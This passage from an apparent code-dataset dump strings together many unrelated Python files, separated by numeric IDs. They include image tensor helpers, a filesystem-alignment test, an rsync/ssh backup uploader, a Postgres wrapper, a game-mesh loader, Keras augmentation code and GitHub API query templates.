img_patch = img[rnd_h:rnd_h + ph, rnd_w:rnd_w + pw, ...]
return img_patch
def uint2tensor(img, normalized=True):
if img.ndim == 2:
img = img[:, :, np.newaxis]
img = skimage.img_as_float32(img)
if normalized:
img = (img - 0.5) / 0.5
img = torch.from_numpy(np.ascontiguousarray(img.transpose(2, 0, 1))).float()
return img
def tensor2uint(img, normalized=True):
img = img.data.squeeze().cpu().numpy().astype(np.float32)
if img.ndim == 3:
img = img.transpose(1, 2, 0)
elif img.ndim == 4:
img = img.transpose(0, 2, 3, 1)
if normalized:
img = img * 0.5 + 0.5
img = img.clip(0, 1) * 255
img = img.round().astype(np.uint8)
return img
def tensor3to4(tensor):
return tensor.unsqueeze(0)
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
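# Minimal usage sketch (not part of the original module): round-trips a random
# uint8 image through augment_img, random_crop and the tensor helpers. The
# array shapes and the normalization flag are illustrative assumptions only.
if __name__ == '__main__':
    demo = np.random.randint(0, 256, size=(64, 48, 3), dtype=np.uint8)
    aug = augment_img(demo, mode='8')          # random flip and/or rotation
    patch = random_crop(aug, 32)               # 32x32 crop
    t = uint2tensor(patch, normalized=True)    # CxHxW float tensor in [-1, 1]
    back = tensor2uint(tensor3to4(t), normalized=True)
    print(patch.shape, t.shape, back.shape)    # (32, 32, 3) torch.Size([3, 32, 32]) (32, 32, 3)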
|
60678
|
import os
import unittest
import tempfile
import fcntl
import struct
from ffrecord import checkFsAlign
FS_IOCNUM_CHECK_FS_ALIGN = 2147772004
def checkFsAlign2(fd):
buf = bytearray(4)
try:
fcntl.ioctl(fd, FS_IOCNUM_CHECK_FS_ALIGN, buf)
except OSError as err:
return False
fsAlign = struct.unpack("i", buf)
return fsAlign[0] == 1
class TestFsAlign(unittest.TestCase):
def subtest_fsalign(self, fname, is_aligned):
if not os.path.exists(fname):
print(f'{fname} does not exist, skip...')
return
fd = os.open(fname, os.O_RDONLY | os.O_DIRECT)
assert checkFsAlign(fd) == checkFsAlign2(fd) == is_aligned
def test_fs(self):
fname = "/public_dataset/1/ImageNet/train.ffr/PART_00000.ffr"
self.subtest_fsalign(fname, True)
def test_tmp(self):
with tempfile.NamedTemporaryFile() as tmp:
self.subtest_fsalign(tmp.name, False)
if __name__ == '__main__':
unittest.main()
|
60690
|
import re
from configparser import ConfigParser
from tadataka.camera.model import CameraModel
def parse_(line):
camera_id, model_params = re.split(r"\s+", line, maxsplit=1)
try:
camera_id = int(camera_id)
except ValueError:
raise ValueError("Camera ID must be integer")
return camera_id, CameraModel.fromstring(model_params)
def load(filename):
camera_models = dict()
with open(filename, 'r') as f:
for line in f:
camera_id, camera_model = parse_(line.strip())
camera_models[camera_id] = camera_model
return camera_models
def save(filename, camera_models):
# sort by camera_id to make it easy to test
items = sorted(camera_models.items(), key=lambda v: v[0])
with open(filename, 'w') as f:
for camera_id, camera_model in items:
line = ' '.join([str(camera_id), str(camera_model)])
f.write(line + '\n')
|
60725
|
import os
import shutil
def ensure_folder_exists_and_is_clear(folder):
if not os.path.exists(folder):
os.makedirs(folder)
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
raise
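# Hedged usage sketch: the scratch directory name below is made up for the
# example; it only demonstrates that the helper creates and then empties it.
if __name__ == '__main__':
    import tempfile
    scratch = os.path.join(tempfile.gettempdir(), 'ensure_folder_demo')
    ensure_folder_exists_and_is_clear(scratch)
    open(os.path.join(scratch, 'leftover.txt'), 'w').close()
    ensure_folder_exists_and_is_clear(scratch)
    print(os.listdir(scratch))  # expected: []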
|
60777
|
import os
import logging
import re
from copy_reg import pickle
from multiprocessing import Pool
from subprocess import check_output
from types import MethodType
from RsyncUploadThread import RsyncUploadThread
from mongodb_consistent_backup.Common import config_to_string
from mongodb_consistent_backup.Errors import OperationError
from mongodb_consistent_backup.Pipeline import Task
# Allows pooled .apply_async()s to work on Class-methods:
def _reduce_method(m):
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
pickle(MethodType, _reduce_method)
class Rsync(Task):
def __init__(self, manager, config, timer, base_dir, backup_dir, **kwargs):
super(Rsync, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir, **kwargs)
self.backup_location = self.config.backup.location
self.backup_name = self.config.backup.name
self.remove_uploaded = self.config.upload.remove_uploaded
self.retries = self.config.upload.retries
self.rsync_path = self.config.upload.rsync.path
self.rsync_user = self.config.upload.rsync.user
self.rsync_host = self.config.upload.rsync.host
self.rsync_port = self.config.upload.rsync.port
self.rsync_ssh_key = self.config.upload.rsync.ssh_key
self.rsync_binary = "rsync"
self.rsync_flags = ["--archive", "--compress"]
self.rsync_version = None
self._rsync_info = None
self.threads(self.config.upload.threads)
self._pool = Pool(processes=self.threads())
def init(self):
if not self.host_has_rsync():
raise OperationError("Cannot find rsync binary on this host!")
if not os.path.isdir(self.backup_dir):
logging.error("The source directory: %s does not exist or is not a directory! Skipping Rsync upload!" % self.backup_dir)
raise OperationError("The source directory: %s does not exist or is not a directory! Skipping Rsync upload!" % self.backup_dir)
def rsync_info(self):
if not self._rsync_info:
output = check_output([self.rsync_binary, "--version"])
search = re.search(r"^rsync\s+version\s([0-9.-]+)\s+protocol\sversion\s(\d+)", output)
self.rsync_version = search.group(1)
self._rsync_info = {"version": self.rsync_version, "protocol_version": int(search.group(2))}
return self._rsync_info
def host_has_rsync(self):
if self.rsync_info():
return True
return False
def get_dest_path(self):
return os.path.join(self.rsync_path, self.base_dir)
def prepare_dest_dir(self):
# mkdir -p the rsync dest path via ssh
ssh_mkdir_cmd = ["ssh"]
if self.rsync_ssh_key:
ssh_mkdir_cmd.extend(["-i", self.rsync_ssh_key])
ssh_mkdir_cmd.extend([
"%s@%s" % (self.rsync_user, self.rsync_host),
"mkdir", "-p", self.get_dest_path()
])
# run the mkdir via ssh
try:
check_output(ssh_mkdir_cmd)
except Exception, e:
logging.error("Creating rsync dest path with ssh failed for %s: %s" % (
self.rsync_host,
e
))
raise e
return True
def done(self, data):
logging.info(data)
def run(self):
try:
self.init()
self.timer.start(self.timer_name)
logging.info("Preparing destination path on %s" % self.rsync_host)
self.prepare_dest_dir()
rsync_config = {
"dest": "%s@%s:%s" % (self.rsync_user, self.rsync_host, self.get_dest_path()),
"threads": self.threads(),
"retries": self.retries
}
rsync_config.update(self.rsync_info())
logging.info("Starting upload using rsync version %s (%s)" % (
self.rsync_info()['version'],
config_to_string(rsync_config)
))
for child in os.listdir(self.backup_dir):
self._pool.apply_async(RsyncUploadThread(
os.path.join(self.backup_dir, child),
self.base_dir,
self.rsync_flags,
self.rsync_path,
self.rsync_user,
self.rsync_host,
self.rsync_port,
self.rsync_ssh_key,
self.remove_uploaded,
self.retries
).run, callback=self.done)
self.wait()
except Exception, e:
logging.error("Rsync upload failed! Error: %s" % e)
raise OperationError(e)
finally:
self.timer.stop(self.timer_name)
self.completed = True
def wait(self):
if self._pool:
logging.info("Waiting for Rsync upload threads to stop")
self._pool.close()
self._pool.join()
def close(self):
if self._pool:
logging.error("Stopping Rsync upload threads")
self._pool.terminate()
self._pool.join()
|
60782
|
import time
import os
import psycopg2
import psycopg2.extras
from pyinfraboxutils import get_logger
logger = get_logger('infrabox')
def connect_db():
while True:
try:
conn = psycopg2.connect(dbname=os.environ['INFRABOX_DATABASE_DB'],
user=os.environ['INFRABOX_DATABASE_USER'],
password=os.environ['<PASSWORD>'],
host=os.environ['INFRABOX_DATABASE_HOST'],
port=os.environ['INFRABOX_DATABASE_PORT'])
return conn
except Exception as e:
logger.warn("Could not connect to db: %s", e)
time.sleep(3)
class DB(object):
def __init__(self, conn):
self.conn = conn
def execute_one(self, stmt, args=None):
r = self.execute_many(stmt, args)
if not r:
return r
return r[0]
def execute_many(self, stmt, args=None):
c = self.conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
c.execute(stmt, args)
r = c.fetchall()
c.close()
return r
def execute_one_dict(self, stmt, args=None):
r = self.execute_many_dict(stmt, args)
if not r:
return r
return r[0]
def execute_many_dict(self, stmt, args=None):
c = self.conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
c.execute(stmt, args)
r = c.fetchall()
c.close()
return r
def execute(self, stmt, args=None):
c = self.conn.cursor()
c.execute(stmt, args)
c.close()
def commit(self):
self.conn.commit()
def rollback(self):
self.conn.rollback()
def close(self):
self.conn.close()
|
60794
|
import os
import numpy as np
from pwtools.common import is_seq, file_write
from .testenv import testdir
def test_is_seq():
fn = os.path.join(testdir, 'is_seq_test_file')
file_write(fn, 'lala')
    fd = open(fn, 'r')
for xx in ([1,2,3], (1,2,3), np.array([1,2,3])):
print(type(xx))
assert is_seq(xx) is True
for xx in ('aaa', fd):
print(type(xx))
assert is_seq(xx) is False
fd.close()
|
60837
|
from __future__ import absolute_import
from . import pubnub # noqa
from . import requests # noqa
|
60866
|
import enum
from rose.utils import *
class VertexFormat(enum.IntEnum):
POSITION = 1 << 1
NORMAL = 1 << 2
COLOR = 1 << 3
BONEWEIGHT = 1 << 4
BONEINDEX = 1 << 5
TANGENT = 1 << 6
UV1 = 1 << 7
UV2 = 1 << 8
UV3 = 1 << 9
UV4 = 1 << 10
class Vertex:
def __init__(self):
self.position = Vector3()
self.normal = Vector3()
self.color = Color4()
self.bone_weights = Vector4()
self.bone_indices = Vector4()
self.tangent = Vector3()
self.uv1 = Vector2()
self.uv2 = Vector2()
self.uv3 = Vector2()
self.uv4 = Vector2()
class ZMS:
def __init__(self):
self.identifier = ""
self.format = -1
self.bounding_box = BoundingBox()
self.bones = []
self.vertices = []
self.indices = []
self.materials = []
self.strips = []
self.pool = 0
def positions_enabled(self):
return (VertexFormat.POSITION & self.format) != 0
def normals_enabled(self):
return (VertexFormat.NORMAL & self.format) != 0
def colors_enabled(self):
return (VertexFormat.COLOR & self.format) != 0
def bones_enabled(self):
return ((VertexFormat.BONEWEIGHT & self.format) != 0) and (
(VertexFormat.BONEINDEX & self.format) != 0
)
def tangents_enabled(self):
return (VertexFormat.TANGENT & self.format) != 0
def uv1_enabled(self):
return (VertexFormat.UV1 & self.format) != 0
def uv2_enabled(self):
return (VertexFormat.UV2 & self.format) != 0
def uv3_enabled(self):
return (VertexFormat.UV3 & self.format) != 0
def uv4_enabled(self):
return (VertexFormat.UV4 & self.format) != 0
def load(self, filepath):
with open(filepath, "rb") as f:
self.identifier = read_str(f)
version = None
if self.identifier == "ZMS0007":
version = 7
elif self.identifier == "ZMS0008":
version = 8
if not version:
raise RoseParseError(f"Unrecognized zms identifier {self.identifier}")
self.format = read_i32(f)
self.bounding_box.min = read_vector3_f32(f)
self.bounding_box.max = read_vector3_f32(f)
bone_count = read_i16(f)
for _ in range(bone_count):
self.bones.append(read_i16(f))
vert_count = read_i16(f)
for _ in range(vert_count):
self.vertices.append(Vertex())
if self.positions_enabled():
for i in range(vert_count):
self.vertices[i].position = read_vector3_f32(f)
if self.normals_enabled():
for i in range(vert_count):
self.vertices[i].normal = read_vector3_f32(f)
if self.colors_enabled():
for i in range(vert_count):
self.vertices[i].color = read_color4(f)
if self.bones_enabled():
for i in range(vert_count):
self.vertices[i].bone_weights = read_vector4_f32(f)
self.vertices[i].bone_indices = read_vector4_i16(f)
if self.tangents_enabled():
for i in range(vert_count):
self.vertices[i].tangent = read_vector3_f32(f)
if self.uv1_enabled():
for i in range(vert_count):
self.vertices[i].uv1 = read_vector2_f32(f)
if self.uv2_enabled():
for i in range(vert_count):
self.vertices[i].uv2 = read_vector2_f32(f)
if self.uv3_enabled():
for i in range(vert_count):
self.vertices[i].uv3 = read_vector2_f32(f)
if self.uv4_enabled():
for i in range(vert_count):
self.vertices[i].uv4 = read_vector2_f32(f)
index_count = read_i16(f)
for _ in range(index_count):
self.indices.append(read_vector3_i16(f))
material_count = read_i16(f)
for _ in range(material_count):
self.materials.append(read_i16(f))
strip_count = read_i16(f)
for _ in range(strip_count):
self.strips.append(read_i16(f))
if version >= 8:
self.pool = read_i16(f)
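# Hedged example of the vertex-format bit flags above; no .zms file is read,
# so only the in-memory flag logic is exercised (the format value is made up).
if __name__ == "__main__":
    zms = ZMS()
    zms.format = VertexFormat.POSITION | VertexFormat.NORMAL | VertexFormat.UV1
    print(zms.positions_enabled(), zms.normals_enabled(), zms.uv1_enabled())  # True True True
    print(zms.colors_enabled(), zms.bones_enabled())  # False False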
|
60913
|
import unittest
import hail as hl
from lib.model.seqr_mt_schema import SeqrVariantSchema
from tests.data.sample_vep import VEP_DATA, DERIVED_DATA
class TestSeqrModel(unittest.TestCase):
def _get_filtered_mt(self, rsid='rs35471880'):
mt = hl.import_vcf('tests/data/1kg_30variants.vcf.bgz')
mt = hl.split_multi(mt.filter_rows(mt.rsid == rsid))
return mt
def test_variant_derived_fields(self):
rsid = 'rs35471880'
mt = self._get_filtered_mt(rsid).annotate_rows(**VEP_DATA[rsid])
seqr_schema = SeqrVariantSchema(mt)
seqr_schema.sorted_transcript_consequences().doc_id(length=512).variant_id().contig().pos().start().end().ref().alt() \
.pos().xstart().xstop().xpos().transcript_consequence_terms().transcript_ids().main_transcript().gene_ids() \
.coding_gene_ids().domains().ac().af().an().annotate_all()
mt = seqr_schema.select_annotated_mt()
obj = mt.rows().collect()[0]
# Cannot do a nested compare because of nested hail objects, so do one by one.
fields = ['AC', 'AF', 'AN', 'codingGeneIds', 'docId', 'domains', 'end', 'geneIds', 'ref', 'alt', 'start',
'variantId', 'transcriptIds', 'xpos', 'xstart', 'xstop', 'contig']
for field in fields:
self.assertEqual(obj[field], DERIVED_DATA[rsid][field])
self.assertEqual(obj['mainTranscript']['transcript_id'], DERIVED_DATA[rsid]['mainTranscript']['transcript_id'])
def test_variant_genotypes(self):
mt = self._get_filtered_mt()
seqr_schema = SeqrVariantSchema(mt)
mt = seqr_schema.genotypes().select_annotated_mt()
genotypes = mt.rows().collect()[0].genotypes
actual = {gen['sample_id']: dict(gen) for gen in genotypes}
expected = {'HG00731': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 73.0, 'sample_id': 'HG00731'},
'HG00732': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 70.0, 'sample_id': 'HG00732'},
'HG00733': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 66.0, 'sample_id': 'HG00733'},
'NA19675': {'num_alt': 1, 'gq': 99, 'ab': 0.6000000238418579, 'dp': 29.0,
'sample_id': 'NA19675'},
'NA19678': {'num_alt': 0, 'gq': 78, 'ab': 0.0, 'dp': 28.0, 'sample_id': 'NA19678'},
'NA19679': {'num_alt': 1, 'gq': 99, 'ab': 0.3571428656578064, 'dp': 27.0,
'sample_id': 'NA19679'},
'NA20870': {'num_alt': 1, 'gq': 99, 'ab': 0.5142857432365417, 'dp': 67.0,
'sample_id': 'NA20870'},
'NA20872': {'num_alt': 1, 'gq': 99, 'ab': 0.5066666603088379, 'dp': 74.0,
'sample_id': 'NA20872'},
'NA20874': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 69.0, 'sample_id': 'NA20874'},
'NA20875': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 93.0, 'sample_id': 'NA20875'},
'NA20876': {'num_alt': 1, 'gq': 99, 'ab': 0.4383561611175537, 'dp': 70.0,
'sample_id': 'NA20876'},
'NA20877': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 76.0, 'sample_id': 'NA20877'},
'NA20878': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 73.0, 'sample_id': 'NA20878'},
'NA20881': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 69.0, 'sample_id': 'NA20881'},
'NA20885': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 82.0, 'sample_id': 'NA20885'},
'NA20888': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 74.0, 'sample_id': 'NA20888'}}
self.assertEqual(actual, expected)
def test_samples_num_alt(self):
mt = self._get_filtered_mt()
seqr_schema = SeqrVariantSchema(mt)
mt = seqr_schema.samples_no_call().samples_num_alt().select_annotated_mt()
row = mt.rows().flatten().collect()[0]
self.assertEqual(row.samples_no_call, set())
self.assertEqual(row['samples_num_alt.1'], {'NA19679', 'NA19675', 'NA20870', 'NA20876', 'NA20872'})
self.assertEqual(row['samples_num_alt.2'], set())
def test_samples_gq(self):
non_empty = {
'samples_gq.75_to_80': {'NA19678'}
}
start = 0
end = 95
step = 5
mt = self._get_filtered_mt()
seqr_schema = SeqrVariantSchema(mt)
mt = seqr_schema.samples_gq(start, end, step).select_annotated_mt()
row = mt.rows().flatten().collect()[0]
for name, samples in non_empty.items():
self.assertEqual(row[name], samples)
for i in range(start, end, step):
name = 'samples_gq.%i_to_%i' % (i, i+step)
if name not in non_empty:
self.assertEqual(row[name], set())
def test_samples_ab(self):
non_empty = {
'samples_ab.35_to_40': {'NA19679'},
'samples_ab.40_to_45': {'NA20876'},
}
start = 0
end = 45
step = 5
mt = self._get_filtered_mt()
seqr_schema = SeqrVariantSchema(mt)
mt = seqr_schema.samples_ab(start, end, step).select_annotated_mt()
row = mt.rows().flatten().collect()[0]
for name, samples in non_empty.items():
self.assertEqual(row[name], samples)
for i in range(start, end, step):
name = 'samples_ab.%i_to_%i' % (i, i+step)
if name not in non_empty:
self.assertEqual(row[name], set())
|
60921
|
from yaml import safe_load
from hashlib import md5
from enum import Enum
from box import Box
class YamlType(Enum):
BASE = 0
PIPELINE = 1
SERVICE = 2
def Yaml(path):
"""
    Pseudo-class for managing a yaml file as a python object.
:param path: path to .yaml file
"""
__type__ = None
    with open(path) as f:
        __text__ = f.read()
yaml = safe_load(__text__)
for yaml_type in YamlType:
if yaml_type.name.lower() in yaml:
__type__ = yaml_type
if __type__ is None:
raise ValueError('Invalid yaml type for %s' % path)
box = Box(yaml[__type__.name.lower()])
box.__path__ = path
box.__text__ = __text__
box.__type__ = __type__
box.hash = md5(__text__.encode()).hexdigest()
return box
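# Hedged usage sketch: the yaml content and the 'name' key below are
# hypothetical; any top-level section named after a YamlType member works.
if __name__ == '__main__':
    import tempfile, os
    sample = "pipeline:\n  name: demo\n  steps:\n    - build\n    - test\n"
    with tempfile.NamedTemporaryFile('w', suffix='.yaml', delete=False) as f:
        f.write(sample)
    cfg = Yaml(f.name)
    print(cfg.name, cfg.hash)
    os.remove(f.name)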
|
60924
|
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import re
from scipy import linalg
import scipy.ndimage as ndi
from six.moves import range
import os
import sys
import threading
import copy
import inspect
import types
from keras import backend as K
from keras.utils.generic_utils import Progbar
import tensorflow as tf
import cv2
class ImageDataGenerator(object):
'''Generate minibatches with
real-time data augmentation.
# Arguments
featurewise_center: set input mean to 0 over the dataset.
samplewise_center: set each sample mean to 0.
featurewise_std_normalization: divide inputs by std of the dataset.
samplewise_std_normalization: divide each input by its std.
featurewise_standardize_axis: axis along which to perform feature-wise center and std normalization.
        samplewise_standardize_axis: axis along which to perform sample-wise center and std normalization.
zca_whitening: apply ZCA whitening.
rotation_range: degrees (0 to 180).
width_shift_range: fraction of total width.
height_shift_range: fraction of total height.
shear_range: shear intensity (shear angle in radians).
zoom_range: amount of zoom. if scalar z, zoom will be randomly picked
in the range [1-z, 1+z]. A sequence of two can be passed instead
to select this range.
channel_shift_range: shift range for each channels.
fill_mode: points outside the boundaries are filled according to the
given mode ('constant', 'nearest', 'reflect' or 'wrap'). Default
is 'nearest'.
cval: value used for points outside the boundaries when fill_mode is
'constant'. Default is 0.
horizontal_flip: whether to randomly flip images horizontally.
vertical_flip: whether to randomly flip images vertically.
rescale: rescaling factor. If None or 0, no rescaling is applied,
otherwise we multiply the data by the value provided (before applying
any other transformation).
dim_ordering: 'th' or 'tf'. In 'th' mode, the channels dimension
(the depth) is at index 1, in 'tf' mode it is at index 3.
It defaults to the `image_dim_ordering` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "th".
seed: random seed for reproducible pipeline processing. If not None, it will also be used by `flow` or
            `flow_from_directory` to generate the shuffle index when no seed is set.
'''
def __init__(self,
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
featurewise_standardize_axis=None,
samplewise_standardize_axis=None,
zca_whitening=False,
rotation_range=0.,
width_shift_range=0.,
height_shift_range=0.,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
fill_mode='nearest',
cval=0.,
horizontal_flip=False,
vertical_flip=False,
rescale=None,
dim_ordering=K.image_dim_ordering(),
seed=None,
verbose=1):
self.config = copy.deepcopy(locals())
self.config['config'] = self.config
self.config['mean'] = None
self.config['std'] = None
self.config['principal_components'] = None
self.config['rescale'] = rescale
if dim_ordering not in {'tf', 'th'}:
raise Exception('dim_ordering should be "tf" (channel after row and '
'column) or "th" (channel before row and column). '
'Received arg: ', dim_ordering)
self.__sync_seed = self.config['seed'] or np.random.randint(0, 4294967295)
self.default_pipeline = []
self.default_pipeline.append(random_transform)
self.default_pipeline.append(standardize)
self.set_pipeline(self.default_pipeline)
self.__fitting = False
self.fit_lock = threading.Lock()
@property
def sync_seed(self):
return self.__sync_seed
@property
def fitting(self):
return self.__fitting
@property
def pipeline(self):
return self.__pipeline
def sync(self, image_data_generator):
self.__sync_seed = image_data_generator.sync_seed
return (self, image_data_generator)
def set_pipeline(self, p):
if p is None:
self.__pipeline = self.default_pipeline
elif type(p) is list:
self.__pipeline = p
else:
raise Exception('invalid pipeline.')
def flow(self, X, y=None, batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_mode=None, save_format='jpeg'):
return NumpyArrayIterator(
X, y, self,
batch_size=batch_size, shuffle=shuffle, seed=seed,
dim_ordering=self.config['dim_ordering'],
save_to_dir=save_to_dir, save_prefix=save_prefix,
save_mode=save_mode, save_format=save_format)
def flow_from_list(self, X, y=None, batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_mode=None, save_format='jpeg'):
return ListArrayIterator(
X, y, self,
batch_size=batch_size, shuffle=shuffle, seed=seed,
dim_ordering=self.config['dim_ordering'],
save_to_dir=save_to_dir, save_prefix=save_prefix,
save_mode=save_mode, save_format=save_format)
# def flow_with_mask(self, X, y=None, batch_size=32, shuffle=True, seed=None,
# save_to_dir=None, save_prefix='', save_mode=None, save_format='jpeg'):
# return ListArrayIteratorWithMask(
# X, y, self,
# batch_size=batch_size, shuffle=shuffle, seed=seed,
# dim_ordering=self.config['dim_ordering'],
# save_to_dir=save_to_dir, save_prefix=save_prefix,
# save_mode=save_mode, save_format=save_format)
def flow_from_directory(self, directory,
color_mode=None, target_size=None,
image_reader='pil', reader_config=None,
read_formats=None,
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='',
save_mode=None, save_format='jpeg'):
if reader_config is None:
reader_config = {'target_mode': 'RGB', 'target_size': (256, 256)}
if read_formats is None:
read_formats = {'png', 'jpg', 'jpeg', 'bmp'}
return DirectoryIterator(
directory, self,
color_mode=color_mode, target_size=target_size,
image_reader=image_reader, reader_config=reader_config,
read_formats=read_formats,
classes=classes, class_mode=class_mode,
dim_ordering=self.config['dim_ordering'],
batch_size=batch_size, shuffle=shuffle, seed=seed,
save_to_dir=save_to_dir, save_prefix=save_prefix,
save_mode=save_mode, save_format=save_format)
def process(self, x):
# get next sync_seed
np.random.seed(self.__sync_seed)
self.__sync_seed = np.random.randint(0, 4294967295)
self.config['fitting'] = self.__fitting
self.config['sync_seed'] = self.__sync_seed
for p in self.__pipeline:
x = p(x, **self.config)
return x
def fit_generator(self, generator, nb_iter):
'''Fit a generator
# Arguments
generator: Iterator, generate data for fitting.
nb_iter: Int, number of iteration to fit.
'''
with self.fit_lock:
try:
self.__fitting = nb_iter*generator.batch_size
for i in range(nb_iter):
next(generator)
finally:
self.__fitting = False
def fit(self, X, rounds=1):
'''Fit the pipeline on a numpy array
# Arguments
X: Numpy array, the data to fit on.
rounds: how many rounds of fit to do over the data
'''
# X = np.copy(X)
with self.fit_lock:
try:
# self.__fitting = rounds*X.shape[0]
self.__fitting = rounds * len(X)
for r in range(rounds):
# for i in range(X.shape[0]):
for i in range(len(X)):
self.process(X[i])
finally:
self.__fitting = False
if __name__ == '__main__':
pass
|
60954
|
from string import Template
from requests import get, post
userInfoQuery = """
{
viewer {
login
id
}
}
"""
createContributedRepoQuery = Template("""
query {
user(login: "$username") {
repositoriesContributedTo(last: 100, includeUserRepositories: true) {
nodes {
isFork
name
owner {
login
}
}
}
}
}
""")
createCommittedDateQuery = Template("""
query {
repository(owner: "$owner", name: "$name") {
ref(qualifiedName: "master") {
target {
... on Commit {
history(first: 100, author: { id: "$id" }) {
edges {
node {
committedDate
}
}
}
}
}
}
}
}
""")
repositoryListQuery = Template("""
{
user(login: "$username") {
repositories(orderBy: {field: CREATED_AT, direction: ASC}, last: 100, affiliations: [OWNER, COLLABORATOR, ORGANIZATION_MEMBER], isFork: false) {
totalCount
edges {
node {
object(expression:"master") {
... on Commit {
history (author: { id: "$id" }){
totalCount
}
}
}
primaryLanguage {
color
name
id
}
stargazers {
totalCount
}
collaborators {
totalCount
}
createdAt
name
owner {
id
login
}
nameWithOwner
}
}
}
location
createdAt
name
}
}
""")
getLinesOfCodeQuery = Template("""/repos/$owner/$repo/stats/code_frequency""")
getProfileViewQuery = Template(
"""/repos/$owner/$repo/traffic/views""")
getProfileTrafficQuery = Template(
"""/repos/$owner/$repo/traffic/popular/referrers""")
class RunQuery():
def __init__(self, headers):
self.headers = headers
def runGithubAPIQuery(self, query):
request = get("https://api.github.com" + query, headers=self.headers)
if request.status_code == 200:
return request.json()
else:
raise Exception(
"Query failed to run by returning code of {}. {},... {}".format(
request.status_code, query, str(request.json())))
def runGithubGraphqlQuery(self, query) -> dict:
request = post("https://api.github.com/graphql",
json={"query": query}, headers=self.headers)
if request.status_code == 200:
return request.json()
else:
raise Exception("Query failed to run by returning code of {}. {}".format(
request.status_code, query))
def runGithubContributionsQuery(self, username):
request = get(
"https://github-contributions.now.sh/api/v1/" + username)
if request.status_code == 200:
return request.json()
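# Hedged example: filling the GraphQL/REST query templates above with string
# substitution only; the login, repository name and node id values are
# placeholders, and no request is actually sent.
if __name__ == "__main__":
    print(createContributedRepoQuery.substitute(username="octocat"))
    print(getLinesOfCodeQuery.substitute(owner="octocat", repo="hello-world"))
    print(createCommittedDateQuery.substitute(owner="octocat", name="hello-world", id="NODE_ID"))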
|
60969
|
import os
import setuptools
from pathlib import Path
directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'peg_in_hole', 'envs', 'assets')
data_files = []
for root, dirs, files in os.walk(directory):
for file in files:
data_files.append(os.path.join(root, file))
setuptools.setup(
name='peg-in-hole-gym',
version='0.1.0',
    description='A gym env for simulating flexible tube grasp.',
long_description=Path('README.md').read_text(),
long_description_content_type='text/markdown',
packages=setuptools.find_packages(include='envs'),
    package_data={'model_files': data_files},
install_requires=['gym', 'pybullet', 'numpy'],
url='https://github.com/guodashun/peg-in-hole-gym',
author='luckky',
author_email='<EMAIL>',
license='MIT',
)
|
60984
|
import pytest
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from ..sequential import sequential
import pkg_resources
PATH = pkg_resources.resource_filename(__name__, 'test_data/')
def test_sequential():
"Test sequential feature selection"
# load data
X = np.load(PATH+'features_largeN.npy')
X = X[:,:20]
y = np.load(PATH+'features_largeN_labels.npy')
# perform SFS
clf = RandomForestClassifier(n_estimators=100)
X_fwd = sequential(X, y, estimator=clf)
X_bwd = sequential(X, y, estimator=clf, direction='backward')
# test shapes
    assert X_fwd.shape == (700, 10)
    assert X_bwd.shape == (700, 10)
|
60991
|
from django.urls import path
from .views import (
change_password,
login,
logout,
profile,
register,
register_email,
reset_password,
send_reset_password_link,
verify_email,
verify_registration
)
app_name = 'rest_registration'
urlpatterns = [
path('register/', register, name='register'),
path('verify-registration/', verify_registration, name='verify-registration'),
path(
'send-reset-password-link/', send_reset_password_link,
name='send-reset-password-link',
),
path('reset-password/', reset_password, name='reset-password'),
path('login/', login, name='login'),
path('logout/', logout, name='logout'),
path('profile/', profile, name='profile'),
path('change-password/', change_password, name='change-password'),
path('register-email/', register_email, name='register-email'),
path('verify-email/', verify_email, name='verify-email'),
]
|
60998
|
from pymesh.TestCase import TestCase
from pymesh import distance_to_mesh, BVH
from pymesh.meshutils import generate_box_mesh
import numpy as np
class DistanceToMeshTest(TestCase):
def test_boundary_pts_cgal(self):
mesh = generate_box_mesh(
np.array([0, 0, 0]), np.array([1, 1, 1]))
pts = np.array([
[0.0, 0.0, 0.0],
[1.0, 1.0, 1.0] ])
sq_dist, face_idx, closest_pts = distance_to_mesh(mesh, pts, "cgal")
self.assert_array_equal(sq_dist, np.zeros(2))
def test_boundary_pts_geogram(self):
mesh = generate_box_mesh(
np.array([0, 0, 0]), np.array([1, 1, 1]))
pts = np.array([
[0.0, 0.0, 0.0],
[1.0, 1.0, 1.0] ])
if "geogram" in BVH.available_engines:
sq_dist, face_idx, closest_pts = distance_to_mesh(mesh, pts, "geogram")
self.assert_array_equal(sq_dist, np.zeros(2))
|
61004
|
import torch
import torch.nn as nn
import numpy as np
class IndexTranslator(object):
def __init__(self, state):
self.state = state
self.px = self.state[:, 0].reshape(-1, 1)
self.py = self.state[:, 1].reshape(-1, 1)
self.vx = self.state[:, 2].reshape(-1, 1)
self.vy = self.state[:, 3].reshape(-1, 1)
self.radius = self.state[:, 4].reshape(-1, 1)
self.pgx = self.state[:, 5].reshape(-1, 1)
self.pgy = self.state[:, 6].reshape(-1, 1)
self.v_pref = self.state[:, 7].reshape(-1, 1)
